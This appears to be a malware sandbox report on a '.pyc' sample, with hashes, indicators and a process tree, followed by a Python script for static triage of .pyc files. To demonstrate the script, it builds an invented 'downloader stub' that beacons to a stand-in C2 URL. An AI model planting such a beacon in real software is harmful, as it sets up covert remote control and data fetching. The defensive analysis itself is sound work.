Analysis
max time kernel: 149s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 29-05-2024 13:55

Behavioral task behavioral1
Sample: SolaraBootstrapper.exe
Resource: win10v2004-20240508-en
26 signatures, 150 seconds

Behavioral task behavioral2
Sample: .pyc
Resource: win10v2004-20240426-en
4 signatures, 150 seconds

General
Target: .pyc
Size: 1KB
MD5: e07e80f50106ec7a618422a0ef94fafb
SHA1: c734af858cf372ea19f5241822642306b25f2fb9
SHA256: f46c97959fd249eda81df23962fad100779918e59efbc95ef26c91c0b4454418
SHA512: 61a24cb45fd9e0a914d4127037abaa0553ab888e9c13485237538a51e99314858256bdd8e5d0a4e7aef1935fbe93d22eab559fa0b3a6e5f4d7e66a3ef0e9fcdc
Score: 3/10
Malware Config
Signatures
-
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Modifies registry class (2 IoCs)
  Processes: cmd.exe, OpenWith.exe
  description   ioc                                                                                  process
  Key created   \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings   cmd.exe
  Key created   \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings   OpenWith.exe

Suspicious use of SetWindowsHookEx (15 IoCs)
  Processes: OpenWith.exe
  pid   process
  848   OpenWith.exe   (15 hook-install events, all from this one process)

Suspicious use of WriteProcessMemory (2 IoCs)
  Processes: OpenWith.exe
  description                       pid   process        target process
  PID 848 wrote to memory of 3612   848   OpenWith.exe   NOTEPAD.EXE
  PID 848 wrote to memory of 3612   848   OpenWith.exe   NOTEPAD.EXE
Processes
  C:\Windows\system32\cmd.exe  (PID 4216)
    cmd /c C:\Users\Admin\AppData\Local\Temp\.pyc
    - Modifies registry class
  C:\Windows\system32\OpenWith.exe  (PID 848)
    C:\Windows\system32\OpenWith.exe -Embedding
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
      C:\Windows\system32\NOTEPAD.EXE  (PID 3612)
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\.pyc
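The process tree above shows that the bytecode in this sample never ran: `cmd /c` hands the `.pyc` to the shell, the analysis image has no handler registered for that extension (no Python interpreter is installed), so Windows spawns OpenWith.exe (the "How do you want to open this file?" dialog, launched as a COM server, hence `-Embedding`), which in turn opened the file in Notepad. The SetWindowsHookEx and WriteProcessMemory hits are therefore OpenWith.exe and Notepad activity, not the sample's, and the 3/10 score reflects an unexecuted file rather than a benign one. The useful next step is static triage of the `.pyc` itself. The script below is an added example, not part of the sandbox report or of any tool it uses: it decodes the `.pyc` header, maps the magic word to a CPython release (the `MAGIC_TO_VERSION` table lists the release magics of CPython 3.5 through 3.13, plus a fallback to the running interpreter's own magic), and, when the running interpreter matches, unmarshals the code object and lists imported modules and string constants without executing anything. The sample `.pyc` at the bottom is constructed inline from a made-up downloader stub so the script runs offline; the real file's bytes are not on this page.

```python
"""Static triage of a CPython .pyc without executing it: decode the header,
identify the interpreter version from the magic word, and (when the running
interpreter matches) walk the marshalled code object for imports and strings.

Added example, not part of the sandbox report.  MAGIC_TO_VERSION lists the
release magic words of CPython 3.5 through 3.13; the sample .pyc is built
inline from a constructed source snippet so the script runs offline.
"""
import dis
import importlib.util
import marshal
import struct
import sys
import types

# Release magic word -> CPython (major, minor).  Pre-release builds use other
# values, so an unknown magic is compared against the running interpreter below.
MAGIC_TO_VERSION = {
    3351: (3, 5), 3379: (3, 6), 3394: (3, 7), 3413: (3, 8), 3425: (3, 9),
    3439: (3, 10), 3495: (3, 11), 3531: (3, 12), 3571: (3, 13),
}
RUNNING_MAGIC = struct.unpack("<H", importlib.util.MAGIC_NUMBER[:2])[0]


def parse_pyc_header(data: bytes) -> dict:
    """Decode the .pyc header.  Layouts:
    3.7+   : magic(4) flags(4) then mtime(4)+size(4) or source-hash(8) = 16 bytes
             (PEP 552: flags bit0 = hash-based, bit1 = check_source)
    3.3-3.6: magic(4) mtime(4) size(4) = 12 bytes
    Raises ValueError for anything that is not a recognisable CPython .pyc."""
    if len(data) < 12 or data[2:4] != b"\r\n":
        raise ValueError("not a CPython .pyc: magic trailer b'\\r\\n' missing")
    magic = struct.unpack("<H", data[:2])[0]
    version = MAGIC_TO_VERSION.get(magic)
    if version is None and magic == RUNNING_MAGIC:
        version = sys.version_info[:2]   # dev build or newer release than the table
    if version is None:
        raise ValueError(f"unknown magic word {magic}")
    if version >= (3, 7):
        if len(data) < 16:
            raise ValueError("truncated 3.7+ header")
        flags = struct.unpack("<I", data[4:8])[0]
        return {"version": version, "magic": magic, "header_len": 16,
                "hash_based": bool(flags & 1), "flags": flags}
    return {"version": version, "magic": magic, "header_len": 12,
            "hash_based": False, "flags": 0}


def triage_pyc(data: bytes) -> dict:
    """Unmarshal the code object and collect imported module names and string
    constants from every nested code object.  marshal.loads and dis only
    decode; no bytecode runs.  The unmarshal is refused unless the file's
    version matches this interpreter, because marshal formats and opcode
    numbering change between releases."""
    hdr = parse_pyc_header(data)
    if hdr["version"] != sys.version_info[:2]:
        raise RuntimeError(f"file targets CPython {hdr['version']}, "
                           f"running {sys.version_info[:2]}; use that interpreter")
    code = marshal.loads(data[hdr["header_len"]:])
    imports, strings = set(), set()
    stack = [code]
    while stack:
        co = stack.pop()
        for const in co.co_consts:
            if isinstance(const, types.CodeType):
                stack.append(const)          # nested function/class bodies
            elif isinstance(const, str) and len(const) >= 4:
                strings.add(const)
        for ins in dis.get_instructions(co):
            if ins.opname == "IMPORT_NAME":  # argval is the module name
                imports.add(ins.argval)
    return {**hdr, "imports": sorted(imports), "strings": sorted(strings)}


# Constructed sample (hypothetical): what a small downloader stub might compile to.
SAMPLE_SOURCE = (
    "import socket\n"
    "from urllib.request import urlopen\n"
    "C2 = 'http://example.invalid/beacon'\n"
    "def beacon():\n"
    "    return urlopen(C2).read()\n"
)


def build_sample_pyc(source: str) -> bytes:
    """Write a timestamp-based .pyc for the running interpreter (3.7+ layout)."""
    code = compile(source, "sample.py", "exec")
    header = importlib.util.MAGIC_NUMBER + struct.pack("<III", 0, 0, len(source))
    return header + marshal.dumps(code)


if __name__ == "__main__":
    sample = build_sample_pyc(SAMPLE_SOURCE)
    report = triage_pyc(sample)
    print(f"CPython {report['version']}, hash-based={report['hash_based']}")
    print("imports:", report["imports"])
    print("strings:", report["strings"])
```

Run `parse_pyc_header` first on the real file: if the magic word is for a release other than the one you have, install that interpreter before calling `triage_pyc`, and if the trailer check fails the file is not a CPython `.pyc` at all despite its name. Keep the check in place rather than forcing `marshal.loads` across versions; a mismatched unmarshal either fails or yields an unusable code object.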